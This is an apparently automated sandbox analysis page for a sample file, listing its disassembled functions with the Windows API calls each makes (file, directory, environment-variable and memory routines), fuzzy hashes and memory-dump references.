Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: x)J$x)J
API String ID: 2991157371-3623248832
Opcode ID: d7a31a8cd288fa3f91d81a588df67527517fff90a1b69377d74b8a654781c9dd
Instruction ID: 93a33c4286e6209fb94db67e843b16da32ba58145b6613e35fb493199b194c46
Opcode Fuzzy Hash: d7a31a8cd288fa3f91d81a588df67527517fff90a1b69377d74b8a654781c9dd
Instruction Fuzzy Hash: 68312D3190422AAFDB21EFACD440BDD77F5EF40325F2541DAE5849B2A1EB765D40CB50

Function 0101DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0101DBF4
SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0101DC30

Strings

sfxpar, xrefs: 0101DC2B
sfxcmd, xrefs: 0101DBEF

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 850df30a4f5e5b0c47ea5ab2e3f99354199c666ab2e54cbb0138fcca1181f591
Instruction ID: 9cb1007f255d773dcb693c674015889c190e70ac8f314e663e60cf7efa3ee115
Opcode Fuzzy Hash: 850df30a4f5e5b0c47ea5ab2e3f99354199c666ab2e54cbb0138fcca1181f591
Instruction Fuzzy Hash: 6BF0ECB240422AB7DB212FD9CC49AFB3BACBF14781B040855BDC59901DE7BC8480D7B0

Function 01009785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 01009795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 010097AD
GetLastError.KERNEL32 ref: 010097DF
GetLastError.KERNEL32 ref: 010097FE

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 6545140cd34ddedeb9647957c0237f1e5d49cd2bb9343428f59914b5565625ab
Instruction ID: 96ad69860a02c9ad5b6ecdd5c7c81921caf53b7ec2ea1dd63a076b0d0c50013a
Opcode Fuzzy Hash: 6545140cd34ddedeb9647957c0237f1e5d49cd2bb9343428f59914b5565625ab
Instruction Fuzzy Hash: C011C231900204EBFF734E29C84466D77ECFB40328F108669F5DE852C2D7798A44CB61

Function 0102AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0100D710,00000000,00000000,?,0102ACDB,0100D710,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue), ref: 0102AD66
GetLastError.KERNEL32(?,0102ACDB,0100D710,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue,01037970,FlsSetValue,00000000,00000364,?,010298B7), ref: 0102AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0102ACDB,0100D710,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue,01037970,FlsSetValue,00000000), ref: 0102AD80

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 7702202ce62b2b8673daab281bf138dfbbcf702a38eaf41812698db52a170fd5
Instruction ID: 0751f8038fa6d3f97cf8c9002dd80e6159192b0d3865aa8b6ace89b4c9ebaa40
Opcode Fuzzy Hash: 7702202ce62b2b8673daab281bf138dfbbcf702a38eaf41812698db52a170fd5
Instruction Fuzzy Hash: BE01D436701236EBC772596C9C84A5B7B9CAF056A37110620F987D7545DB2AD401C7E0

Function 01009F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0100D343,00000001,?,?,?,00000000,0101551D,?,?,?), ref: 01009F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0101551D,?,?,?,?,?,01014FC7,?), ref: 01009FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0100D343,00000001,?,?), ref: 0100A011

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: c1857082255e6a049a902268d9f6581954f2aca25d20e63ba46c94aacdd09cf7
Instruction ID: 493a91900ea6ba7a0376d952b5b7f2b7dbb6d2942c63b486677dcdc525178ea5
Opcode Fuzzy Hash: c1857082255e6a049a902268d9f6581954f2aca25d20e63ba46c94aacdd09cf7
Instruction Fuzzy Hash: FF31DF71208309EFEB16CE24D858BBEB7A9FB80715F04051CF9C55B2D1C776A948CBA2

Function 0100A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 0100C27E: _wcslen.LIBCMT ref: 0100C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A30C
GetLastError.KERNEL32(?,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A329

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 5905f848c35a093a069ae5fcde5d633ac699b35c27b95da228acb529f66d5cef
Instruction ID: 2753721b89d16633d4da004b44c93eea8ea069dc90c5e05c833055b3f4a33166
Opcode Fuzzy Hash: 5905f848c35a093a069ae5fcde5d633ac699b35c27b95da228acb529f66d5cef
Instruction Fuzzy Hash: BC019235700324EAFF63AA794849BED7788AF09680F048494FAC1D70C4D698D58187A5

Function 0102B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0102B8B8

Strings

, xrefs: 0102B8FD

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: ba188ca890e86d4939bc96032415b636620f1406a3b2f572a34015cb0f752316
Instruction ID: 8f3a7bf5e30a118955fe2a2897e48e7c3e210e6cfc639311d24a4aca95e09aab
Opcode Fuzzy Hash: ba188ca890e86d4939bc96032415b636620f1406a3b2f572a34015cb0f752316
Instruction Fuzzy Hash: 7C41E6716042AC9EDB228E688C84BFABBF9EB55304F1408EDD5DA87142D275AA45CF60

Function 0102AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0102AFDD

Strings

LCMapStringEx, xrefs: 0102AF7D, 0102AF87

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: c7fef48be2296cca53707560364f8cb9835b6ca405959bf9b56271051d34957a
Instruction ID: fc26a525c943a906db5dc6c05d9e3b3fbff72a473449783ad4b3c627160805c6
Opcode Fuzzy Hash: c7fef48be2296cca53707560364f8cb9835b6ca405959bf9b56271051d34957a
Instruction Fuzzy Hash: 4101D37260021AFBCF129F91DC05DEE7FA6FB48750F014259FE546A160CA3A8931EB90

Function 0102AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0102A56F), ref: 0102AF55

Strings

InitializeCriticalSectionEx, xrefs: 0102AF1B, 0102AF25

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 302a019dbeaf82214919972e0eea13124c5f90502faf52fd30f98011303ebe8e
Instruction ID: 0cd4227ebb1f8c79556e1aa949217fd28dea33b59e134ef13fec1096ed568925
Opcode Fuzzy Hash: 302a019dbeaf82214919972e0eea13124c5f90502faf52fd30f98011303ebe8e
Instruction Fuzzy Hash: 48F0BE7164521DFBCB125F55CC01CAEBFA9EF48B11B4142AAFD889B210DE364A10AB85

Function 0102ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0102ADEE

Strings

FlsAlloc, xrefs: 0102ADC0, 0102ADCA

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 9cbe2b318088d838a01eb4e32772cfc8ce853ec239d613cbffde1ea34ad3e691
Instruction ID: 3a21702ad11497728db6cb2e0387121dbf0560affef3f07ab36b39d74d4d022f
Opcode Fuzzy Hash: 9cbe2b318088d838a01eb4e32772cfc8ce853ec239d613cbffde1ea34ad3e691
Instruction Fuzzy Hash: 0FE02B7174122DBBD711AB6ADC02D6EBB9CEB54721B01029EFC869F300CD755E0187D5

Function 0101EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101EAF9

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Strings

3Qo, xrefs: 0101EAE7, 0101EAF3

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Qo
API String ID: 1269201914-1944013411
Opcode ID: 9afa2990cb248d5ee6738347147f801d3f77db4849f43d9f2ff7470d64b7aad7
Instruction ID: 6a392caec40f87ad32311ed5acac0c46c4695ec0245888cf11c8964c0505cc9c
Opcode Fuzzy Hash: 9afa2990cb248d5ee6738347147f801d3f77db4849f43d9f2ff7470d64b7aad7
Instruction Fuzzy Hash: CAB012C729A0437C30056201DE01C3F010CE6D1D90320C01FFCC8DC044DC853C060471

Function 0102BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0102B7BB: GetOEMCP.KERNEL32(00000000,?,?,0102BA44,?), ref: 0102B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0102BA89,?,00000000), ref: 0102BC64
GetCPInfo.KERNEL32(00000000,0102BA89,?,?,?,0102BA89,?,00000000), ref: 0102BC77

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 68ef42276056663f9dd3458a6bc31962d0c03b25a1b1a1ebe56c2e83fb602d98
Instruction ID: dc26fb32cbd1b25910bc1b75880fbe1b411f7fc4dd38961313886e2f0b740b56
Opcode Fuzzy Hash: 68ef42276056663f9dd3458a6bc31962d0c03b25a1b1a1ebe56c2e83fb602d98
Instruction Fuzzy Hash: 4251557090026A9FEB21EF39C4806FABFF5EF11300F2844AEC5D68B251EA399545CB91

Function 01009A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,01009A50,?,?,00000000,?,?,01008CBC,?), ref: 01009BAB
GetLastError.KERNEL32(?,00000000,01008411,-00009570,00000000,000007F3), ref: 01009BB6

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 482f6d8db5c0bce1668ae7537059063390ec8a5e9216608f8bff20ea8c6ca937
Instruction ID: 7557fd9c4df2f93c6a0fc0a5dc7a825324d032f683c303b97ce969a12a1e8d67
Opcode Fuzzy Hash: 482f6d8db5c0bce1668ae7537059063390ec8a5e9216608f8bff20ea8c6ca937
Instruction Fuzzy Hash: 9841E030504B018FFB26CF18C6845AABBE9FBD4338F44896DE8D9832D2D774A8448B91

Function 01001E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01001E55

Part of subcall function 01003BBA: __EH_prolog.LIBCMT ref: 01003BBF

_wcslen.LIBCMT ref: 01001EFD

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 88eca5124a952619d90a00d068f10e8fd7c6cee2eee23f8ae32bee879e823fcb
Instruction ID: e5c9adad6ff5dd0153a5b92cc96599982bf1690653ebffbaffdfee554a6e74f8
Opcode Fuzzy Hash: 88eca5124a952619d90a00d068f10e8fd7c6cee2eee23f8ae32bee879e823fcb
Instruction Fuzzy Hash: 92312C7190410A9FEF16DF98C944AEEBBF5BF58304F10009DE585A7290C7369E15CB60

Function 01009DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,010073BC,?,?,?,00000000), ref: 01009DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 01009E70

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: bade3f7d09595feb4d651d055fca35b75c8d505236ca0e14f2f20f72c9aab3b7
Instruction ID: 9d7a2f22e67313912af0d7f27b090b44b064072031fe6cfd9ec0339a49277ed1
Opcode Fuzzy Hash: bade3f7d09595feb4d651d055fca35b75c8d505236ca0e14f2f20f72c9aab3b7
Instruction Fuzzy Hash: 602128312882869FE716DF38C491AABBFE8AF51308F08495DF5C987182D339D90DCB61

Function 0100966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,01009F27,?,?,0100771A), ref: 010096E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,01009F27,?,?,0100771A), ref: 01009716

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ad665fde2b961dcbed20d6093c84885532f6ab280d4c4360eba7bd52c49c80f8
Instruction ID: afe85808430fbd69eac987090d6ecf19bd39f063ff70a4f5062835919f52a8bd
Opcode Fuzzy Hash: ad665fde2b961dcbed20d6093c84885532f6ab280d4c4360eba7bd52c49c80f8
Instruction Fuzzy Hash: 5221B0715043446FF3718A69CC88BE7B7DCEB49328F000A19FADAC65C6C778A884C631

Function 01009E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 01009EC7
GetLastError.KERNEL32 ref: 01009ED4

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 33df4dcb73bf073ea9ce1491ce19c303f41a8deafb2eae274c87834fbd6fefd5
Instruction ID: eebab815987d1a6cb08529afbc0710887e3d1c3d3ade0c4db6194a97a0a7c768
Opcode Fuzzy Hash: 33df4dcb73bf073ea9ce1491ce19c303f41a8deafb2eae274c87834fbd6fefd5
Instruction Fuzzy Hash: F31129306007009BF736C628C884BA6B7E9AB44324F50066AE1D7D25D2D371FD45C760

Function 01028E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01028E75

Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,01041098,010017CE,?,?,00000007,?,?,?,010013D6,?,00000000), ref: 01028EB1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
